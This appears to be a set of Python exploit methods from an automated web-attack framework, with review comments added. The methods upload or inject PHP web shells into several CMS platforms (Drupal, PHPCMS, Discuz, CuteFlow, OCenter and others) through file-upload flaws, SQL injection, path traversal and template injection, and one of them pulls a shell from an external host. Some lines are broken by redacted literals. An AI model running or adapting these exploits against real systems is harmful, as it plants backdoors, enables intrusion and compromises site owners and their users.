def exploit(self):
    """Upload a PHP web shell through ``/actions/photo_uploader.php`` and report its URL.

    The shell body comes from ``shell/shell02.php`` (relative to the current
    working directory) with ``__RANDPASS__`` replaced by a generated password;
    on a JSON reply the expected location under ``files/photos/`` is handed to
    ``self.shell_info``.

    NOTE(review): nothing exits the ``for`` loop on success, so as written the
    upload is repeated up to 10 times per call. The ``open()`` handle is never
    closed, and the bare ``except`` around ``req.post`` hides the real error.
    Server-side this is visible as a multipart POST with a ``.txt`` file part
    and a ``plupload`` form field.
    """
    if self.url == '' or (not self.url.startswith('http://') and not self.url.startswith('https://')):
        self.report('url error', Level.error)
        return
    for i in range(10):
        self.url = self.url.strip('/')
        data = {'plupload': '1', 'name': 'test.php', 'submit': 'submit'}
        randpass = get_random_password()
        # The part is named with a .txt extension; the server-side rename to .php
        # is assumed from the JSON 'file_name' reply below.
        shell = {
            'file': ('%s.txt' % get_random_password(),
                     open("shell/shell02.php", 'rb').read().replace('__RANDPASS__', randpass))
        }
        url = self.url + "/actions/photo_uploader.php"
        req = session()
        try:
            r = req.post(url=url, data=data, files=shell)
        except:
            self.report('目标连接失败', Level.error)
            return
        try:
            result = json.loads(r.text)
            shell = '%s/files/photos/%s/%s.php' % (
                self.url, result['file_directory'], result['file_name'])
            #print shell, randpass
            self.shell_info(shell, randpass, 'php')
        except Exception as e:
            # A non-JSON reply or missing keys lands here; the loop then continues.
            print e
            pass
def exploit(self):
    """Drive ``msfconsole`` against ``exploit/multi/http/cuteflow_upload_exec`` and report the resulting shell path.

    Host, port, target URI and SSL flag are derived from ``self.url``; the
    console output is scanned for ``Retrieving file: <name>.php`` and the shell
    is reported under ``/upload/___1/``.

    NOTE(review): ``self.url`` and the URI derived from it are interpolated
    into a single-quoted shell command; if ``proc`` runs this through a shell,
    a URL containing a quote breaks out of the msfconsole argument (command
    injection into the scanner itself) — confirm how ``proc`` executes.
    ``retrieve_file[0]`` raises ``IndexError`` when the pattern is absent, and
    ``'https' in self.url`` also matches an ``http://`` URL whose path
    contains "https".
    """
    if self.url == '' or (not self.url.startswith('http://') and not self.url.startswith('https://')):
        self.report('url error', Level.error)
        return
    self.url = self.url.strip('/')
    # Path component after scheme and host; duplicated assignment is harmless.
    target_uri = target_uri = '/'.join(self.url.split('/')[3:]) or '/'
    is_ssl = "true" if 'https' in self.url else 'false'
    password = get_random_password()
    url_parser = urlparse.urlparse(self.url)
    if ':' in url_parser.netloc:
        host, port = url_parser.netloc.split(':')
        host_port_setting = 'set rhost %s;' % host
        host_port_setting += 'set rport %s;' % port
    else:
        host_port_setting = 'set rhost %s;' % url_parser.netloc
    # The newlines (if any) inside the literal are stripped before execution below.
    cmd = '''msfconsole -qx ' use exploit/multi/http/cuteflow_upload_exec; set payload generic/custom; %s set targeturi "%s"; set ssl "%s"; set payloadstr "eval($_POST[%s])"; run;exit -y;' ''' % (host_port_setting, target_uri, is_ssl, password)
    p = proc(cmd.replace('\n', ''))
    p.run()
    p.wait()
    x = p.getoutput()
    for line in x:
        print line
    retrieve_file = re.findall('Retrieving file: (\w+).php', str(x))
    shell_path = '%s/upload/___1/%s.php' % (self.url, retrieve_file[0])
    self.shell_info(shell_path, password, 'php')
def exploit(self):
    """POST a base64 ``data:`` URI to ``/index.php/Home/Uploadify/preview/`` and report the stored file.

    The reply is searched for a ``"result"`` value; its last path segment is
    reported as a shell under ``/preview/``.

    NOTE(review): the success path does not leave the ``for`` loop, so the
    request is repeated up to 10 times. ``except Exception: return`` discards
    the failure reason, and ``print rsp.text`` dumps every response to stdout.
    """
    if self.url == '' or (not self.url.startswith('http://') and not self.url.startswith('https://')):
        self.report('url error', Level.error)
        return
    for i in range(10):
        self.url = self.url.strip('/')
        req = session()
        try:
            # Reachability probe only; the response is overwritten below.
            rsp = req.get(url=self.url)
        except:
            self.report('连接目标失败', Level.error)
            return
        try:
            randpass = get_random_password(5)
            upload_data = "data:image/php;base64,%s" % (base64.b64encode(
                '<?php @assert($_POST[%s]); ?>' % randpass))
            headers = {
                'Content-Type': 'application/x-www-form-urlencoded',
                'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36',
            }
            rsp = req.post(self.url + '/index.php/Home/Uploadify/preview/', data=upload_data, headers=headers)
            print rsp.text
            m = re.search(r'"result".*?"(.*?)"', rsp.text)
            if m:
                path = m.group(1).split('/')[-1]
                self.shell_info(self.url + '/preview/' + path, randpass, 'php')
        except Exception as e:
            return
def exploit(self):
    """POST a template body with a traversal ``name`` to ``/admin.php/code/mod`` and report ``/cache.inc.php``.

    NOTE(review): the shell URL is reported without checking the POST reply,
    so a rejected write still produces a "success" record. The success path
    does not leave the loop, so the request repeats up to 10 times.
    Server-side this shows as a POST whose ``name`` field contains ``../``
    sequences.
    """
    if self.url == '' or (not self.url.startswith('http://') and not self.url.startswith('https://')):
        self.report('url error', Level.error)
        return
    for i in range(10):
        self.url = self.url.strip('/')
        req = session()
        try:
            # Reachability probe only.
            rsp = req.get(url=self.url)
        except:
            self.report('连接目标失败', Level.error)
            return
        try:
            randpass = get_random_password()
            upload_data = {
                'tpl_content': '<?php @assert($_POST[%s]); ?>' % randpass,
                'name': '/../../../../../cache.inc.php',
                'dir': 'tpl',
            }
            rsp = req.post(self.url + '/admin.php/code/mod', data=upload_data)
            print rsp.text
            self.shell_info(self.url + '/cache.inc.php', randpass, 'php')
        except Exception as e:
            print e
            return
def exploit(self):
    """Send a crafted ``user_login_block`` form whose ``name[]`` keys carry an SQL ``INSERT`` into ``menu_router``.

    Success is inferred from the string ``mb_strlen() expects parameter 1`` in
    the reply; the reported "shell" is a ``?q=`` path that the inserted
    ``menu_router`` row is expected to resolve.

    NOTE(review): the success path does not leave the loop, so the same
    ``INSERT`` is attempted up to 10 times. Server-side the request is a
    POST to ``/?q=node&destination=node`` with array-style ``name[...]``
    parameters containing SQL keywords.
    """
    if self.url == '' or (not self.url.startswith('http://') and not self.url.startswith('https://')):
        self.report('url error', Level.error)
        return
    for i in range(10):
        self.url = self.url.strip('/')
        req = session()
        randpass = get_random_password()
        tmp_pass = base64.b64encode('@eval($_POST[%s]);' % randpass)
        target = '%s/?q=node&destination=node' % self.url
        # Raw form-encoded body; built by concatenation rather than a dict.
        insert_shell = "name[0;INSERT INTO `menu_router` (`path`, `page_callback`, `access_callback`, `include_file`,"
        insert_shell += "`load_functions`,`to_arg_functions`, `description`) values ('<?php eval(base64_decode(\"%s\"));?>'," % tmp_pass
        insert_shell += "'php_eval', '1', 'modules/php/php.module','','','');#]=bob&name[0]=larry&pass=lol&form_build_id=&form_id=user_login_block&op=Log+in"
        try:
            rsp = req.post(
                target,
                data=insert_shell,
                headers={
                    'Content-Type': 'application/x-www-form-urlencoded',
                    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36',
                })
            #print rsp.content
            shell = '%s/?q=<?php eval(base64_decode("%s"));?>' % (self.url, tmp_pass)
            if "mb_strlen() expects parameter 1" in rsp.content:
                self.shell_info(shell, randpass, 'php')
        except Exception as e:
            print e
            return
def exploit(self):
    """Register a member with an ``info[content]`` image tag pointing at a remote ``.txt?.php`` file, then locate the fetched copy.

    Either the MySQL error text leaks the stored path directly, or the
    ``/uploadfile/<date><timestamp>.php`` names between ``startTime`` and
    ``finishTime`` (from ``self.getTime``) are probed with GET.

    NOTE(review): as shown, ``"*****@*****.**" % get_random_password(9)`` has
    no conversion specifier and raises ``TypeError`` before any request —
    this looks like a redacted literal; confirm against the original. The
    shell password ``'akkuman'`` is a fixed literal, and ``except Exception:
    pass`` silences every failure. Nothing leaves the outer loop on success.
    """
    if self.url == '' or (not self.url.startswith('http://') and not self.url.startswith('https://')):
        self.report('url error', Level.error)
        return
    for i in range(10):
        self.url = self.url.strip('/')
        url = self.url + "/index.php?m=member&c=index&a=register&siteid=1"
        data = {
            "siteid": "1",
            "modelid": "1",
            "username": get_random_password(9),
            "password": get_random_password(12),
            "email": "*****@*****.**" % get_random_password(9),
            "info[content]": "<img src=http://file.codecat.one/normalOneWord.txt?.php#.jpg>",  # remote web shell location (hard-coded external host)
            "dosubmit": "1",
            "protocol": "",
        }
        try:
            req = session()
            # Time window around the request bounds the timestamp-based filename probe.
            startTime, _ = self.getTime()
            htmlContent = req.post(url=url, data=data)
            finishTime, dateUrl = self.getTime()
            if "MySQL Error" in htmlContent.text and "http" in htmlContent.text:
                successUrl = htmlContent.text[htmlContent.text.index(
                    "http"):htmlContent.text.index(".php")] + ".php"
                self.shell_info(successUrl, 'akkuman', 'php')
            else:
                successUrl = ""
                for t in range(startTime, finishTime):
                    checkUrlHtml = req.get(url=self.url + "/uploadfile/" + dateUrl + str(t) + ".php")
                    if checkUrlHtml.status_code == 200:
                        successUrl = self.url + "/uploadfile/" + dateUrl + str(
                            t) + ".php"
                        self.shell_info(successUrl, 'akkuman', 'php')
                        print successUrl
                        break
        except Exception as e:
            # print e
            pass
def exploit(self):
    """Upload ``shell/shell01.php`` to the bundled jquery-file-upload ``server/php/`` handler and report the returned URL.

    The JSON reply's ``files[0].url`` is URL-decoded and re-rooted at
    ``self.url + '/files/'`` before being passed to ``self.shell_info``.

    NOTE(review): the ``open()`` handle is never closed and the path is
    relative to the cwd; the success path does not leave the loop, so up to
    10 uploads are made. Server-side this is a multipart POST with a
    ``files[]`` part carrying a ``.php`` filename.
    """
    if self.url == '' or (not self.url.startswith('http://') and not self.url.startswith('https://')):
        self.report('url error', Level.error)
        return
    for i in range(10):
        self.url = self.url.strip('/')
        target = "%s/themes/dashboard/assets/plugins/jquery-file-upload/server/php/" % (self.url)
        randpass = get_random_password()
        backdoor = {'files[]': ('%s.php'%get_random_password(), open('shell/shell01.php', 'rb').read().replace('__RANDPASS__', randpass))}
        req = session()
        try:
            r = req.post(target, files=backdoor)
            tmp = json.loads(r.text)
            shell = urllib.unquote(tmp['files'][0]['url'])
            # Keep only the part after '/files/' so the reported URL uses self.url as origin.
            shell = shell.split('/files/')
            shell = self.url+'/files/'+shell[-1]
            #print shell, randpass
            self.shell_info(shell, randpass, 'php')
        except Exception as e:
            print e
            pass
def exploit(self):
    """Upload ``shell/shell02.php`` as the ``upload`` part of ``/clients/editclient.php?id=1&action=update``.

    NOTE(review): the response ``r`` is never inspected — the fixed path
    ``/logos_clients/1.php`` is reported as a shell regardless of outcome,
    so the result is unreliable for anything that consumes ``shell_info``.
    ``except Exception: pass`` hides all errors; the ``open()`` handle is
    never closed; nothing leaves the loop on success.
    """
    if self.url == '' or (not self.url.startswith('http://') and not self.url.startswith('https://')):
        self.report('url error', Level.error)
        return
    for i in range(10):
        self.url = self.url.strip('/')
        target = "%s/clients/editclient.php?id=1&action=update" % (self.url)
        randpass = get_random_password()
        backdoor = {
            'upload': ('%s.php' % get_random_password(),
                       open('shell/shell02.php', 'rb').read().replace('__RANDPASS__', randpass))
        }
        req = session()
        try:
            r = req.post(target, files=backdoor)
            # Assumed destination: the server is expected to store the upload as <id>.php.
            shell = "%s/logos_clients/1.php" % (self.url)
            #print shell, randpass
            self.shell_info(shell, randpass, 'php')
        except Exception as e:
            pass
def __init__(self, url, taskid=0, targetid=0, cmd_connect='', data_redirect='', dns_server='', proxies={}):
    """Initialise per-target state on top of ``Exploit.__init__``.

    Args:
        url: target base URL (presumably stored as ``self.url`` by the base
            class — the attribute is read below but not assigned here).
        taskid, targetid, cmd_connect, data_redirect, dns_server, proxies:
            forwarded unchanged to ``Exploit.__init__``.

    NOTE(review): ``str.strip('http://')`` strips any of the characters
    ``h t p : /`` from both ends rather than removing a prefix, so a host
    name that starts or ends with one of those letters (e.g. ``test.example``
    or ``shop.example``) is mangled in ``self.site``. ``proxies={}`` is a
    mutable default shared across instances if the base class keeps a
    reference to it.
    """
    Exploit.__init__(self, url, taskid, targetid, cmd_connect, data_redirect, dns_server, proxies)
    self.randpass = get_random_password()
    self.chrome = 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36'
    self.headers = {'User-Agent': self.chrome}
    # Candidate sets collected during the run (filled elsewhere in the class).
    self.password = set()
    self.template = set()
    self.users = set()
    # Intended to be the host part of the URL; see the strip() caveat above.
    self.site = self.url.strip('http://').strip('https://').split('/')[0]
    self.form = {}
    self.success = {}
    self.noexist = []
    self.counttext = 0
def exploit(self):
    """POST a template-injection search query to ``/search.php`` and report ``/ht_cache.php``.

    The ``searchword``/``searchpage`` fields are assembled into a raw
    form-encoded body with the generated password embedded.

    NOTE(review): the reply ``rsp`` is never checked — the shell path is
    reported unconditionally after any non-raising POST. A bare ``except``
    returns silently. The success path does not leave the loop, so the POST
    repeats up to 10 times. Server-side this shows as a ``searchword``
    parameter containing ``{if`` / ``{searchpage:...}`` template tags.
    """
    if self.url == '' or (not self.url.startswith('http://') and not self.url.startswith('https://')):
        self.report('url error', Level.error)
        return
    for i in range(10):
        self.url = self.url.strip('/')
        randpass = get_random_password()
        target = "%s/search.php" % self.url
        exp_data = "searchtype=5&searchword={if{searchpage:year}&&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al({searchpage:lang}&yuyan="
        exp_data += "join{searchpage:jq}&jq=($_P{searchpage:ver}&ver=OST[3]))&3[]=fil&3[]=e_pu&3[]=t_conten&3[]=ts('ht_cache.php','<?&3[]=ph&3[]=p%20@ass&3[]=ert($_P&3[]=OST[" + randpass + "&3[]=]); ?>');"
        headers = {
            'Content-Type': 'application/x-www-form-urlencoded',
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36',
        }
        req = session()
        try:
            rsp = req.post(url=target, data=exp_data, headers=headers)
            shell = '%s/ht_cache.php' % self.url
            self.shell_info(shell, randpass, 'php')
        except:
            return
def exploit(self):
    """POST a ``newconfig[...]`` form with an injected key to ``/utility/convert/index.php`` and report ``data/config.inc.php``.

    The generated password is encoded as a ``Chr(n).`` chain so it survives
    being written into the generated config file.

    NOTE(review): the dict literal repeats the keys ``'submit'`` and
    ``'newconfig[target][dbhost]'`` (the later value wins, so the duplicates
    are dead). The reply ``r`` is never inspected and the shell path is
    reported after any non-raising POST; the result is also printed to
    stdout. The success path does not leave the loop, so the POST repeats
    up to 10 times. Server-side this shows as a form key containing a CRLF
    followed by ``eval(``.
    """
    if self.url == '' or (not self.url.startswith('http://') and not self.url.startswith('https://')):
        self.report('url error', Level.error)
        return
    for i in range(10):
        self.url = self.url.strip('/')
        randpass = get_random_password()
        # Build 'Chr(65).Chr(66).…' for each character of the password.
        realpass = ''
        for x in randpass:
            realpass += 'Chr(%d).' % ord(x)
        key = {
            'a': 'config',
            'source': 'd7.2_x2.0',
            'submit': 'yes',
            'newconfig[target][dbhost]': 'localhost',
            "newconfig[aaa\r\neval(Chr(101).Chr(118).Chr(97).Chr(108).Chr(40).Chr(36).Chr(95).Chr(80).Chr(79).Chr(83).Chr(84).Chr(91)." + realpass + "Chr(93).Chr(41).Chr(59));//]": 'localhost',
            'newconfig[source][dbuser]': 'root',
            'newconfig[source][dbpw]': '',
            'newconfig[source][dbname]': 'discuz',
            'newconfig[source][tablepre]': 'cdb_',
            'newconfig[source][dbcharset]': '',
            'newconfig[source][pconnect]': '1',
            'newconfig[target][dbhost]': 'localhost',
            'newconfig[target][dbuser]': 'root',
            'newconfig[target][dbpw]': '',
            'newconfig[target][dbname]': 'discuzx',
            'newconfig[target][tablepre]': 'pre_',
            'newconfig[target][dbcharset]': '',
            'newconfig[target][pconnect]': '1',
            'submit': 'yes'
        }
        url = self.url + "/utility/convert/index.php?a=config&source=ss7.5_x2.0"
        try:
            req = session()
            r = req.post(url=url, data=key)
        except:
            self.report('目标连接失败', Level.error)
            return
        print self.url + '/utility/convert/data/config.inc.php', randpass, 'php'
        self.shell_info(self.url + '/utility/convert/data/config.inc.php', randpass, 'php')
def exploit(self):
    """Register a user, upload ``shell/shell01.php`` via ``doSendShare.html``, then read its stored path back through a ``union select`` in the ``information`` URL.

    Each stage reports a distinct failure message; on success the
    ``<attr title="...">`` value from the final reply is reported under
    ``/Uploads/``.

    NOTE(review): as shown, ``'******' % get_random_password()`` has no
    conversion specifier and raises ``TypeError`` inside the first ``try``,
    which the bare ``except`` turns into '注册用户失败' — this looks like a
    redacted literal; confirm against the original. The raw response is
    written to ``xxx.txt`` in the cwd (a leftover debugging artifact), and
    the ``open()`` handle for the shell file is never closed. Every path in
    the loop body returns, so the loop runs at most once.
    """
    if self.url == '' or (not self.url.startswith('http://') and not self.url.startswith('https://')):
        self.report('url error', Level.error)
        return
    for i in range(10):
        self.url = self.url.strip('/')
        req = session()
        try:
            # Reachability probe only.
            rsp = req.get(url=self.url)
        except:
            self.report('连接目标失败', Level.error)
            return
        try:
            username = '******' % get_random_password()
            reg_data = {
                'role': 1,
                'username': username,
                'reg_type': 'email',
                'nickname': username.split('@')[0],
                'password': get_random_password(),
            }
            rsp = req.post(url=self.url + '/index.php?s=/ucenter/member/register.html', data=reg_data)
        except:
            self.report('注册用户失败', Level.error)
            return
        try:
            upload_data = {
                'content': get_random_password(),
                'query': 'app=Home&model=File&method=upload&id=',
                'submit': 'Submit',
            }
            randpass = get_random_password()
            shell = {
                'Filedata': ('%s.php' % get_random_password(),
                             open("shell/shell01.php", 'rb').read().replace('__RANDPASS__', randpass))
            }
            # Session cookies from the registration above are reused here.
            rsp = req.post(self.url + '/index.php?s=/weibo/share/doSendShare.html', data=upload_data, files=shell)
        except Exception as e:
            self.report('上传Shell失败', Level.error)
            return
        try:
            # The random marker is prefixed to the id so the row can be located in the HTML.
            inject_url = '/index.php?s=/ucenter/index/information/uid/23333 union (select concat(\'%s@\',id),2,concat(savepath,savename),4 from ' % get_random_password(
            )
            inject_url += 'ocenter_file where ext in (\'php\') order by id desc limit 0,1)#.html'
            rsp = req.get(self.url + inject_url)
        except Exception as e:
            print e
            self.report('获取Shell地址失败', Level.error)
            return
        # Debug dump of the raw reply; left behind in the working directory.
        f = open('xxx.txt', 'wb')
        f.write(rsp.content)
        f.close()
        m = re.search(r'<attr title="(.*?)"', rsp.text, re.I | re.M)
        if m:
            #print self.url+'/Uploads/'+ m.group(1), randpass
            self.shell_info(self.url + '/Uploads/' + m.group(1), randpass, 'php')
            return
        else:
            self.report('获取Shell地址失败', Level.error)
            return